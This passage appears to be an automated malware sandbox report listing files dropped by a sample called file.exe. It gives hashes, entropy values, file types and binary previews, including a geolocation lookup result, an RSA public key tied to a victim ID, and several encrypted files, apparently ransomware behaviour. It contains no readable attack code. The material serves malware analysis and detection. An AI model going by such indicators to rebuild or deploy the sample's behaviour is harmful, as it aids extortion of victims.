          SHA-256:19105E8EC716EFFD81117BC635B81C502A6CA963F7A9E8643BD006B6FC4239B3
          SHA-512:A1B7A19828D5796E44F6351E4410B79FA84D0529AB66D5B4282A3BAD2688060D2C384818EC1547679B0B03C13EC88029CB238C24D101F13A61F3D6708D5D2AF5
          Malicious:false
          Preview:CMMM .IF..k.Z.}..c.V.?.{.........s..B.....j....nU...T.lT.BA...8...2..$Y..j.....<.....N9..Z.&..'+...4..../hM....W-../{DN.R.q....hA...M..a.i..W{.E..J.....!......@..w..gu.V...4wu......+...p..$.\....D`.Y.9:....H.!x[...P...U).=.C_.(...G.w.......)...k..a|.w.?....5..h.A.+JC...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):358
          Entropy (8bit):7.321439887542832
          Encrypted:false
          SSDEEP:6:op+9pEPYcvcRdkwpXgQV4u8ay0SgaMM53q7YIIDfqoKjGxssZacii96Z:NRdkAXh8ayDgaxowqpixpZacii9a
          MD5:74AF317A92CB6DD58939ABE7CD298220
          SHA1:78F52CF13912F6DC90C88D65D3471ACD534ED688
          SHA-256:E66D2F3EE754EC3D4E9136DD50934CEC80088F0174082F5C3B3F2099D2661437
          SHA-512:19F572A7F025E2F7783B058276344AE7BD5D66045DBB5279C5C770B57DEE081C4FA970557A6778E0A26B10D1B15F7E8B510E9AF59DBD5AD9691154EE2A47688F
          Malicious:false
          Preview:CMMM 5.%....n>........~D..J..zi$:..3.A.......'..$!...*..!.x.O...._...<.C.`.`.l...S~3.a.=...e.C!...j...xp....hr>4rAw..mh..x......e.......;5x.%.ruz.A.H..H.......~.4.....7..6..F.....O./..\.......v.......Uz.Z...K\|Dk.:U'dX...n...+..........%p.=.L......x... ...'...&.}.^r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):358
          Entropy (8bit):7.2268579943878075
          Encrypted:false
          SSDEEP:6:lIMbzVt/HNfDrcQfSX2WAsSbp/RZ0WAlOTxBImI1n0ZjGxssZacii96Z:lbbhtFMLX2RkWAGxFIn0ZixpZacii9a
          MD5:89269C681788CFFE9D79C84BED679230
          SHA1:8C11CEBA960427019CF7D33BF7765702B69E9655
          SHA-256:657A4F07B5290B37E6E432D7A5DB0800CBD058726A2C1AE3D49F4D7C2CEAFEDB
          SHA-512:038BD5BBFC07596F8DD13AEB1CAFE17152D96CE654629D7485CF27038CF5BDF50FFF2EC3F6B12E096BBA461A49C6035357B7EF7E686ACC5220BBFD578783C677
          Malicious:false
          Preview:CMMM ...bGg-..i..O@..<.....(.5.J-......X../<fV.pR..D9..-^.U..AA[.3....._.:"..Q:....Pn.......L.[..ZK3NP."y.K......%..]Eir.J&.n.X..j.D3...D.Y...L.R5k..j.(...<....e*6.$.bG..wA.ja.z._....W..).F0..9.D.l...Rh.n.W.......g..Bs.P..K.@&{U..)8y8YwuH.Y.VT....v..sC'..t.x../.K...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):358
          Entropy (8bit):7.155258656450469
          Encrypted:false
          SSDEEP:6:w5YUGxZOLI689wtrCcdjuwHkuhlSFUdQma51jGxssZacii96Z:wiUImb1fdjuMhlSFEgixpZacii9a
          MD5:E1A1DA53C09EF061C81E6988C38C1718
          SHA1:EF3F41B17449FDD3CA33347A606427B85A2092A8
          SHA-256:7177CBF6B702C21F331D705CED4F7C5655D7983BD627F8B900279F2CD82B47BE
          SHA-512:E0CD1149E6983A43BDC12BEB06842239700CC2A9C7B19067C3751DB89B91B3DE73DA889332FDBC64EDB6F6EB0D282807071262BCA9ADADACB20B473653673432
          Malicious:false
          Preview:CMMM ...>5..'g.-....}v[4N..r9Y&..Z.....h.2:..j..w'{.Z...n,6xT.<cl<..T5....`q.@..njuj..(.....xk..ym...45B/5...M.....\...i\..>......9.}z....fB.4.4...}...>.....'.<.6.C`...].%<].R..R<..N.=..v......KS....C.f.g(.E...j..._s....n......v...-P.Jd'...8..Rq.;`.B..Ih.D.u..._.#r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):358
          Entropy (8bit):7.219576375226159
          Encrypted:false
          SSDEEP:6:CirelKgZg6zhqup/tyXuQwb4fZYI7xzo/zTijGxssZacii96Z:CiKlHgzyQRZY6xU/zTiixpZacii9a
          MD5:D8FF85170F19C5AA9910BA879758FD42
          SHA1:E892D9C3FDF0138A8D3C498D753F84C59AE3BA78
          SHA-256:7470B2FBFCE5D7207C085AD40EE86AB3062250D96AF88051DD647CD7046688D8
          SHA-512:736DD60C23ABB83BA83C78B7831FE1E5DE41073563EF0A2F827D314D4941EF2C9909E77FC6A78538862783922AC72048C2F2DE95C667945C0415A8052DD5EE86
          Malicious:false
          Preview:CMMM .1.....o."8.......>w..A.o...HvD.U....4.......R..V...P....Zu.N.d\@ej'Jk..N.4.Iy..D.].$...........)9..DgHP.~...1c...N.BB..<..1;....0...@.&a.{VciW..p.....U.;2.....c0..v.-]y...1I..$....3o......w.5M}z......>...F.T......?*...-...d..s./"d....R.xY.$D..?..-!...w.r~r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):411
          Entropy (8bit):4.6420780896559455
          Encrypted:false
          SSDEEP:12:Yd9wpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdgHD+CtrRQVctrRQVzRZQ3htrRQV/m0
          MD5:EDCA7C5EAEC41C2D1880B6161721C8BE
          SHA1:9A650E1C3E6B7E8858A48D55F21C10C99EBE8AC8
          SHA-256:CADED2E85735BEB1518F1C907BB108B1DCD9C481DAD682B7E0A8E1009C541065
          SHA-512:2C39E15ADEAC90FB6D8F5F87B384F86A79E15F0582A4E8618C264FEE7223958E2F51AC5FA60001F95AE215351B677D91718E551DAB655B14F532556CC2D6AA7A
          Malicious:false
          Preview:{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}
          Process:C:\Users\user\Desktop\file.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):558
          Entropy (8bit):5.9641189283105875
          Encrypted:false
          SSDEEP:12:YGJ68UNbNL0zG/dDnzGPCRGhvVUppYZj50/ixpZr:YgJUNb5XDHgq/iTl
          MD5:F045B26CB70DB6CCC8DB1535B182BF4E
          SHA1:A67A8EDFA7974502DC9037F1A0550582EB86C907
          SHA-256:06B9FE6981432C1B5E056AA233EF61AC101215043F338A4F065A8FD9ED0C3C85
          SHA-512:35A4BFC0970A01D820A0FDE5E85AFCF618AD27A9BA63B3BB31D9142FA793EA33A5C291D3495157DFB67EB31DD1659359B514C77EBA6DB240EC85B34113A82971
          Malicious:false
          Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzVYb8CErbW\/pFkhLDyb\\n9IMnMjZ6LXzFZ8VEK4FVwrKK37fmeqilqo43fmLPIG+zg6ATp\/1+RCjWyBlcmgRf\\nQVbxQd5kgkJM\/qvDuoZiSU6bEtO2Gul62Y3rVW2Ry4f8yWTC80E15UtxD5x1RU10\\nOhjVMu2+nzvF4BBiTGN4wOR+KEbmXJMx8GbyX8rKpSVM4AthODhf1O7xO8LDE3A2\\nLVb+fgXtlp+KU7InK\/ykqgYGQJ7ot1T2xhbuiI2CypYEjUWj6ryIMBtYTR27kn1G\\nnslb1JL7NiXoCSEhbYxUqUv0hVuG1eZ7WqqGumf7CKjMJXZnLoyNBfWoli2qxuRX\\nfwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5"}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):64281
          Entropy (8bit):7.99699570119898
          Encrypted:true
          SSDEEP:1536:ieKYWbEVz/Nbd1lwTFN6DpP4Z+tdWUmgKUoPuVuRsqe:LKAzlxzwhyltLKUoPuVuRBe
          MD5:FE8505C3C03B689BD9A80223E34C453E
          SHA1:A3FF907581E5DB31625B1CFD100F32F0894FDE3E
          SHA-256:894EB23F4252EA8F63FCACEA41B825512412CC00236CF76B2F99960CF3C78FCB
          SHA-512:9C69EAD74C4D853F48ED49466810BB115DDE4CFC8D6E5098473E7F94A958932A6C246C133ECBBB9B0447D893F2EB97EFE77F916EBD6B56C0DB6EA1D2E396577D
          Malicious:true
          Preview:<?xml..QE^5h.L.../.<r..A...a..T..K.3.7.9..U.y.6. T+.1d..K.5{......d.rI....S......s....2....d..04*...hx..o!..K.....deR...V...BL~h%...(....A_....7..z,...{....*]c..$.5[.?7.'.>kz.....?iL.+...`..dvd...p.b3.[r.%.....u........%......d^...!....;..e.........9..V...F.a.`.z..)....'..@.6..|D......,.A[....\.?..|...a.5_..^..../{..GQ..C..wZ..N......E..;K.cv....C....~].n.|.JW.'.?.Q..2@...@.=U.x..f...zr.5....w...O....$".`....fw..mh..V..G+....X2..M. .+e.t~E.?.0.0.y..[U6.+(..@.O.&.MX.v.D..E.auP..T.V....>..`..d;.'.x#-oI..R.R.w..v&.,..Q......q..{.u.2XS.n....RQ..s~R.LD..]g%Zf....r.g..4.+....]|...U..,3...h..[s.K.(.(3..wp.*..#... ....(..@..+....nT.._*d<W,..n6!..T....B..fvh.yJ5x{.[..8.....W*....L..},...o6..]....[C0C~..{bX..;1...4.l.(.|..:,z50t'`...`...Y'...a.W..zs.H......v-....k+N....F..C.-E.V./....T...?..-....tN6t....W.$.......uA."..n....1.!....i.e.o...W.R.P.`.A.Bg.Cv..cA..S.|1.?.8?..,..A)....1.jU...s*q1..v.oZC...N...o3H...XvQ6UR......|...2.L)....{..R.<A...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.9783684657868905
          Encrypted:false
          SSDEEP:192:/LkYDVWlbMyahjNth+J/oH6HDem+nSjX2yLNrLdKKY1bpQ2+KRNmd6X:/AYDVWlbnahjNiJ/oHoD3XNLpdK7iL5G
          MD5:BA6DDA431C75BAF052A7155CE4FC3DB6
          SHA1:6D9DE9A76866E96D965625FC668D7F62EABAEED9
          SHA-256:F2B1BB2DB8125EB11991DBA838C7347F7AEE555DA1E3D68D6F05FFF3159360AE
          SHA-512:451EC6C5D866B232B0DC324FEEC25CE22B2071964EDA5D2CD3F42960D3DEB2B8162DB14B060A47507276F5B0E2BE2B5FFEE0790A233CDFB525DCCAFDD4379924
          Malicious:false
          Preview:W......m...Lp.{~!;.P1.6:.....$U@4...m...W;..*w..yN)R.Z..*K..t.........!..M_|.c..|.|.Xp<x..j.dS.,.E.=...(.>...X.7...U..-..s:....f..D%.S..5t..$ .......,.;.i..*...".:..v(pB.v.P..6....O.[....]...0*w."...w.Z.Y.U.z8.-#[.J..Q;......)..5..S.g.;g..8........:y.vF.%.)...1?HBE.i...;.FDG.`..(c...2o........F#9..%...G.Tk.,.`NU0..N..@^.N..........}.eG....C.y..,.....,.......HD.....$v+F.J..~.p|c}c.........^...>..rv..=...... ..$.Y......G..y+...a.i..}.FB.RQQ. H.S_.X.......6.._#.@........v...'k;..|..U.}.vw.....?.0.jk.^.1.....=T....U@Je.{9._:oQm#yP..,YMc..........t.......R<.6B..}.'_.sY.L..!o..n.D..+.[..8?6/...f..V.HlT.%.P'}6..."O1.FM..Vv.mh.o|...)@.w`..<.I|8..M..........&gB...].....H,....U...........;<x.K..x.l..3R{..dt.z.T.6... J.-.................5P...Z....p.Y......1_..k.g....1.....F`C.j.. .o>]..Y.$.I..k.......N/....x..e~........Z.....N.9...E...AL..WP..,...=%p...^..r.*.....<..X...0.g...w.gD.3yk..)..}'.*.LK.t...9.....(..#..;.5.n.s....|.....n..o....?......?.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):6.7883080068389585
          Encrypted:false
          SSDEEP:6144:FZsJ4+HcDaAGInXi6tXbltsR/IJ1S7EAe3sw1Xq6EPdqXfiWWfWG0N:kkaAJiJIB38qKhs
          MD5:E24A5571E5099A1A09B7E97BB268F838
          SHA1:7ACD5CE872A61222664A370263ACC7A1E4B5D315
          SHA-256:4DBF11C553D191E400D7BC264563E06D3E5E59A9DA001C90B7DFD7FFAA3ACF04
          SHA-512:44DE763752F00A68BC795971E4D686C910FCA2C5D8E3FD978BC946034591204E3051FCC6411FCFE3054E6970AC3AEBA002F0D48A494D90555FCC0E8E25A8001F
          Malicious:false
          Preview:..2]...`.w..}_.....m.........[...&..p.N!n.$$..#n-....l..,..ls%.mj......LG..*v.>..Ro..y..@..b.5.v.v.`P.Vy=..BN...........1..5.I..9+...OsZ..S....fy...._...O7.0..Q...cg.5..YAF.......4..f2W....m..Y..A...[W...H..I.O..Y..;-]..]..$%@$_...I...gg.RD7...P..T1.4|........o..oo.....[3.zT.z]EUv..5Dt..e.....W....O[.}Z.oA...{n.~..;.......]Z...~...n../6./:3....j.i...2..jY..0...f... .OgP..7|/...x....V.....v...^...%..b..(......<L^..D.S.k7K.X."\....w....C9.|..b..}...uw...{0..J.D.*/....._.6d....8...7...0Y....m....C...~.".-no..........d.T..L.:Fg...p....vu.^bq....P....~N..7.../O<..a]q...2.T.A...5..j.Fq..P"MS.o......A.......jj..Bfc4..3y..T.1..S.NP.."...45.+.:..:.eG..F.A..c.V.R.+}5..._e.5....N0.....~xL..F.2a...}.R..H..d..?9$e..g...lmKn. ...G"...PB...e`...Ln.....K..1..............\2u#{...8&...=.....P...>...k.@....v......Y`....z../...T9...P.......:..wI.Q.!.t,1..X~N7..].....@..<....&.7....x3MR..d.Vm`...?.oh&[=..i.&.#;Kh...26.gh ......~.}.F.<.%..O..la..IR.K..Q....~..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):3.208464334243508
          Encrypted:false
          SSDEEP:3072:jPp7RSg774MLe9t6OWip4WywQeC4Kq9uAJZ/v+FQZMnSMJ0e:Lp7R5MwkYOtQeJKGJdv+a6+e
          MD5:DBF2BB790CF08F4F6870FE100BF91F71
          SHA1:86F19DF75B9F9E50A11D2824972684C47A9D7087
          SHA-256:219C4EB7113FCDBAA29D5AD670F31969BD9580FF3BB937BA47BAD7D0ED03B59C
          SHA-512:14525B20F29A804F2ADA9F5AE45011247AF22780E2B1D82385517F03474135DF39D4BB2B4891F9C6235FC4F06DB9CCA1DF30744B944D77F85B65682355852B3A
          Malicious:false
          Preview:.....V.$.*.N....~(.QB.\..T...!..j|..W._&._=e.J.U[..t...3T\C5..f.21........<..n...F.ysz.g*.._...?..~.B.i...g..yi;..gm.z..#.....%........CQr..*..4.&...].E.Z.....b.&..,T{..8D....C..Z%|..........$^Y.,].....C....9....).5.8....m.....y..Ax..4.S.;.XK..Pd..PVI..a.N"2.n.qi.d\...x]....h..Zc...s...I!7.k...8..2{Al....h...Y.7.._%#..z.."aM.6=..M....+.....[...@ ....z.t....7...A.r?.)...M..Z...BG...>..sY.....x...:.........jS...U...Z...;jh..).EA..Ly.....A./..}{...z.l.....]....J..]z.8.>........W..W.X...w}`.dD2.+....*.AS~.........4l.`.*.M..!e..X....2.A..b.F~H..~_.F.(..i.....&sp..b.....'.d...K=a..obO..o..)..._...pl..;".F..y.kR.. ~..C5;..D.5......U}...v.....u..%.c..@.........+..h..6.<..M.+=...........@C....B.&d..Mq....5.....0j.I.[...>...^+..d.8...Y.....WO.R..y.N..;T.,_*.."5_;.g..H..F-Vc...9.z~...r`.......<....]_Y...~....thAm5....#W.U.`~.Q.Q.=-...`%p...9.;./.$Z.[&...j$......a.$.].g....W...c..4...1.l.%=....l.mK4...8..!...~c@...i\..@8...~hfMy....l.r./.4.zS...|RY.M.i]u=..o.h)
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):3.207583018390994
          Encrypted:false
          SSDEEP:3072:U/JGTXtTYT2va1tHvaqAztO2KT/ANs4bZf1BiuiyioFhtZTC0TjdJtb+kgR:GGJTpvaHSqieAa4V1kuiABCoztqkI
          MD5:6A3EFB12DD33F33DD0A9EFBF75FC686D
          SHA1:4E2252BA753FF5D8C215A7A6E8D805C96E4779B7
          SHA-256:AA5421D1D1847A03E54C9539823158B78FBDFA2E770D8510B5554314CDB3A3C9
          SHA-512:A9670D90AD53746A4791172638EE7A343A2064ACA6A97A9D138DA6738F20C9008B1F934E1D4C9BC9957A5CCC5EB5DBF661757CD75C039A00C01E5DCA8761BEFB
          Malicious:false
          Preview:.............c.....`wC_?..{.6m=.....G..@R.+r(36...B._Y........:....`_Zll[........I...At J..R`........_.n....W..OV.L..$r.<kS...mU...X...Xc.!.UnYb..ZX....W..m..$...6..Kpl/.a.....u.Rd.^...@..[..%.....`.J.C.....3.O{-.{..y.Q,./..C..c.../.#LM..NxwK...U...Z.`0..(...6......,.ot,T...D'...sa.s...D.Z#&..`....@.....AP.G+..a.-1;..a..K....4..lnM..t.......Ahh^.......c......f...a.z...3V.8|..WK3.......5M]L..j.5..Lb<.',.P....H..v..,&{{.x..@..;X..6.I...._w.......>ki\.....L....l%.G...n.Y....|.C^eO.q.>..../..*zE.....V...0e... I..GGl~......O.F.*._......v..e.T...Xt...i5.....1.y.Y*...F.......\.-u.?E....@o/..7C.}...nE..|..y...b......#..?.....S..O./..3..P.xDy....Q0...c.*.B.)3...W..a......R..S..!g...158x8}s.;"..G.whhp0.:p>.?..!{R.......!..t2....Q..`.r....s.9......sK.\W...n.I%.....J.....=?(.7....a....(.M}`......F#W.V.C.FYu...G.D*Kg&.....*.-.O.$...>...@-.o...1ysV(u`.....*....-..X...q..L...Df..X...h%.....N.A....b..q......i.x....G}....9...lM.<....m...e.........".
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):6.592675235687294
          Encrypted:false
          SSDEEP:6144:zMfVuaUJZDx9w9f2TzA2/zbEsvBxvqcnfxngsHIN0HTcAd+b67RG+rdsxQnv:zQf9CA2fj/nni+Q+v
          MD5:67995DD317564D9017688DAEB726757C
          SHA1:0AAD038B51D58135691E57A6D7FA41079F2DE7EA
          SHA-256:FD7FF712957B7A37214871A74367195CD5618E2AD8A062BBCE9B045E1F6B65C1
          SHA-512:7DE88403665F2216F9F7D1298B22036A459B8032DC08F785F1B3AF5FC5C81BE694F039958DD57AB656D917BD9F99EE6C467A553A2DF82063A1BB7C3687273566
          Malicious:false
          Preview:\.......h.^...9.'Y.@0.......Q..&S...2O......Z.M+...|;}..8U.3mn<U....E.!DK...^0.....q!.WM..y.7.)...W.4...@p...../1a....8.]H.f...2e"...V.....U...^.s.?=...&..R......W4..x........W....Y|s..0!0.?.=e..\....#N...M.-(.-.'..\...B........(N...JK.E....'.M.v[...|.)sP.H.>.}...e.tJ. .,.r7.f.cP;Y...b.'...}..S....?.L..#]..p.xi/G&..YT@..3.e....h.#9 F.?kE.F..r.C...')....Y.....).....>.t&...vZ..[@N......;.TB.m..v.i.5.+..!..b...2.....`.L."..f.n.......A..&.........On.sk.=.Q...1q....i.7Q..@p....jv..."<.R*..+.P..\W.n.PU..C............s.#. .o...e....<.............#..G...`"....x.H...PG.....)m....y.3Z..v...<..>Wx....r.K......b..s.{Hy.i........`m.]?....2..0.i..u.z...>.v.m.....9...q...:......71....X..../.@.n@3.Dk..6..77...9.h.....M...]D....o^...t......D....x..3..q..q.....T.I!...@..{I..M....'.........d.c....p..x..7P=*....k.0..[.nz.G..]..#...`?..^.rs...8.<.H.xEan.i.u........b..xJ.s5..)..we....1.r.fD.9X(z.<q.-'4CYof.?.\.G.$~........T'.y..{.........*.i..Q..j...G....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):20346
          Entropy (8bit):7.992087826889046
          Encrypted:true
          SSDEEP:384:UBANEvVM7ohKZF6m3xtgK4EsDkKKqlJsjCqZo/pS6Q:UKNEtM7ohcF6m33QEKd3lJ4VSw6Q
          MD5:6A3A619AB588239F307F760F0CE8D131
          SHA1:F58CDEAB0BB7070214991D56503C260FA42C0002
          SHA-256:F4AD33834F6FECBD1646F2031454C4F94A16FD9ABBFAB11BA7894221979AE771
          SHA-512:0B56F8191B53B2B4520C9DCE68C12F8CAADC39E2AC9A300BC9DE044F4D5A7C445A649B1B38F7F27C9267641254D013F9B0010E245F3522558FACFA68850D62C1
          Malicious:true
          Preview:.....).q....Yb......Az.{q.]...x.....(e.E..a..k....*.g..:.......dtsknv..&...s.Y...2...Sy...k\..T.`.....D.....Y..U.`.dV..0..x&..j...)r..%...Lr...?....D..L..p.....i.r.c.2.e.;.....h82E..,x...?`.~$C.y.......1...B.'.,LGk.2T..s...dN=....'..M.ir|........*.t......2......*~.Wi...^.....0.m}v.9K..x]."..A..4.3M>C....z.~.,|_.0c....4...G..y|.q.N(.o....`.*^.I..:+.v...t.............aQ....}.$!t..DKD.dM.0x...'...."..w....u.R]..W.....A(...\......i....0+....,Q...iz06.C.(.....Sz.5h.d.)QW...\,D)e'..V.0......[.#....ye...bx.E.VP.k.1.l.X~..../.Ym!C!..:C..S..V.qx...J..n*....@.~IdJp..Dp.n"..............2t..Q._.z.i$.O......./...q....h...CP....U..,gk...O.K..ed.+r6.."...k..&....*I..R./w....'....2..E.........,......w..Bv.....OU..|.Xo&..qq..J'.}1.h...X.*0.J...Y.zm:~3@.q...t....jx.....k...E,.K...u.....C.A...5..FI^....-..jn.X2..H..9m.-).zg..#`,.7.U+.....D..O......( C.'B..x.gD........#..op.:...Xy.....`&fk...b.7DZ...d..x.:A.@o..P5.ARR.T^.<.l..C...VK..}..r.W..k|,q..7..XvM.Td.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1583
          Entropy (8bit):7.875799064543605
          Encrypted:false
          SSDEEP:48:Y0womEJAeJZULbQ5+iJbJKof7mmsG+W+xnUbhiD:ueJ+YZXn+GR+9U0
          MD5:04A4D4C951E9510C826D4163A8413A0D
          SHA1:A413006D6ADA326A48CE018AFE74B5CB2370A48D
          SHA-256:3378B4EBF719C123D181E3F4F89B9D3F2B9BA54A62672A4CAF1184B3B16ADBC3
          SHA-512:15D06F9ED038A595DD527DE3E3F30F2A813B4EE349A48D3D6E96A677C135FD3720E6FA09B63E00E38008D93B4A8556421BBBAFE09A1386F904DE75877E283D52
          Malicious:false
          Preview:{"spoH...)Ju.P...7]y...m...4p.\.^CHZ7.\...f.;B..;]..G.4..UP...7A>uG^...(..5USbk....=U.^.5~.W(@....".H.........J..".s!.=k.8....e.....0.2=.;\..DMS.VD....2D."..1....'.K...7.)L.....5.(...>.\-V/.~*/._...ZEI...r?%m.u?......{.H.~-...R?..;.Z.......7=C..oMt.J.... ...RG.....eb.MU.^%!4+p...[./.2.......@h....!...I...]......6..%..#o.0....d'.y. .Vl..S.`.....f.;xX#.#h...lzb4 o]."..q.....C.../0.m"v...2a.....b}...........U.....*}..j|.}.%.../.....}..8.l$.2.|..p.(..J.N?..:...t..Dl.C..`.....V..S.....[..t.s.&i..T@.n...".\}A....j.`...c..s....L^.,uF....(...[..pD4JNF.lk.a..Y...};.+..+...7>.v..J............wc.L..{j$g..'...6,k.\.>.e..I..Dx.'_9.z2...O.k...,......|-...m..w..>..%....7.......f..R..c.u.:...a.....W......f..N.=..QI..[.f.+6c*.../)-.a.f.....i..%.bh......fkT._.....%Q...[....^..8C1\6f^.z...W+._f,........&.RZAx.!i..\|..E>"..?...'?!_.F......X.-. .=...Q..+...9..p..N....1..@..r...O:b:.q....u...~K........D*..h"....n...6..?.sj:._...E.].....].D....v.5..M
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.98038919816165
          Encrypted:false
          SSDEEP:192:VB1U4HOu3NvGgH897Oj1vdqTpSrulUHGlNwPawDhr20:VBjH3vGm8Q3VuSAnsF
          MD5:82E268CD41DCC1EF8DACAC0384D2E75B
          SHA1:5BA339CC48CE4BBD51775973E9988597BAA791D8
          SHA-256:7C94070A33644E60BE904F1EDD875A95B16140286FBFBDFE06474A4E8569448C
          SHA-512:20841B65E2C0B300E11830B362A5E6832D08981240E274FC1912A0BB5D794ACE1CD32B294535D4A77118FD3E201F8627AA5100704552AF807C5183519BCF2A30
          Malicious:false
          Preview:regf....s.c..=..h......|.5\..%).uj.'.....k..J.Y.3!).@....rt0-.~\>..i..n..7.D.JHI.:!...........DP.<.D.....).h....]...V..RT_.CaN6.4...X.k....o..h.f...h.u8H..u7tg=@.,.v.....4...qB.....h..Mc8......j.x....1...^x.....p..-."q.K...r..d..J....z..g..I...m.x.G7.....:.T8.mR.c....~v...o...s..k.N..e...IR..]......o....J..D....BV..g>....i.~.T.L:+k.~.<E*s.p...y.nVU}.@..Y|]..K...{..8E..n7;.p.."d..o.$....(..R..1.b.....,&..d_.].^V...l`).........V.jX..o.c.L.jx..r.XX.Bb._..D.u.F?...3..^.. p.1..?[..3.j..gQ.U...g}*~.t..I....(k....;..x..g.oY.9&...m.=.J..R|A4.GI.t$".u.@m..-......1'..\.......Qn.l.x..A...|p..q@2.$<.p.D.i.....w.....h(..2..lZN.v._S~.6.......4.. n.g..>..../.~...B@d......F....@H..>J%.W.........d).~....h...X.p.f..jlb2>..p..!....i.O............._......k.....v.Z.^...af.._.........'>.."~f..h7_m.&...!.....'.<.f..xs.%.o...2.VR.E|6..|...S.'.....K3.Z..4..R.@.......I....u.P.)..tI.$....|..Vs0.[ho...@.6......2.n.K.y....D.'....x..P.J.......&...."..,.N.7SFE..7..|&.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.976837069404893
          Encrypted:false
          SSDEEP:192:qEEkSWYCa8XUEUwPuqeTeoLJeOmp4rqGJEVscTBEfehB1h6w:LEkSThiU2OTech+lVsB2hl6w
          MD5:BEF907B484DB28A786D6CD309A79E7FC
          SHA1:438E1D09047525EF3C1597A91B80D3C4DA56356E
          SHA-256:7EDE539E8AE8D3FD3A82646D66475087734DFCAADB221ECDA3AED60DBE077064
          SHA-512:C386DCD92FA9AC49F383186792E98E193962CBAA6DB1336C0153B2F0BA2B6F2775B5D0D77E7E1E41184933B90C0385B2F4721CA42B25F6B463FE8AC9B049E1A3
          Malicious:false
          Preview:regf.[E.V_..G.N.N..3..K.s....@+...D.....Z-.D..u~.-r..KI..a.y.+.w...g..<d...=|.r'N.........y#(@.4.....l...~\.....4{...H.).$N.8zg.'.....r.i..C..+3f.......X.'.07.d........WzJ*.......... ...'...;../N.t.Ix.\.=..1L].&...@+..^....U.s.G.zG....C{.....[..j...h..l.....Zd...G....."~..!.e.y.".8#...U(..^.=0F.q/..6)...P.h...@.2.W.`=.-Q.W..b.0.....n....o...>$.L.).p...a.Y1 ..L..n-............qU....H..]....P.Q.H.4AA(....6C0l3K.....E0.T...8.p..5.pV.....%.s7/......*.6]"&..........1...2...z[.u....T?.j^.G.4.S.W3X."p.-=.d.....#...kI.Vt0...+$sy%"=*.."..AC.1Pd.oP...3.*[$9H.>q...f...kG).6..4OD|..o...iY...7..s*c....v..<. =.k.|".x.U...k....)Ju>..k.&.I.&.a.w`y..n.Z...{...........e.v..fd.g....Ebn...Z.*P......5.(..6..h.&.b.........8fk.../r.$.O..mi.e.v.g..........SC.#F...Sx!%|.Y4zU.&...ZJY.v....b....X8|A.....3..P%n+..H...4!j.....^.).~.70.}.p..b.7M..j2.Db.....CBCn.N\B4..N.....E.\M^.L.....@GS....:.s..u*)Nv.0y..3).CmE.b.q.d..[..\...U..^..2..A....M.\...la.Eb..js.....L..h..U
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978480552495787
          Encrypted:false
          SSDEEP:192:qdA8qID4RLHhaoITCUrQj3WUr00apLjwCPEjvJ:2A8j4lAoOJrq3GpXtPU
          MD5:85CEE8E1A64DA311633DA1C84F5C1E30
          SHA1:98E32606EE657B5DE0B9A9E1A42D59F6378F2DA2
          SHA-256:B3D84FE7000742F6DD426EF1DD4C7015ED89EB4605762B2C102850A33BFF7001
          SHA-512:FE58FA8266B0FE2FFE40A7979464529112B9A396DF5DC0543AF2E284BFC54B453D14D9BED6FA4E96DCEC21F8396C7AC77E35F02711A86F247F5BF4DCCA2E51DD
          Malicious:false
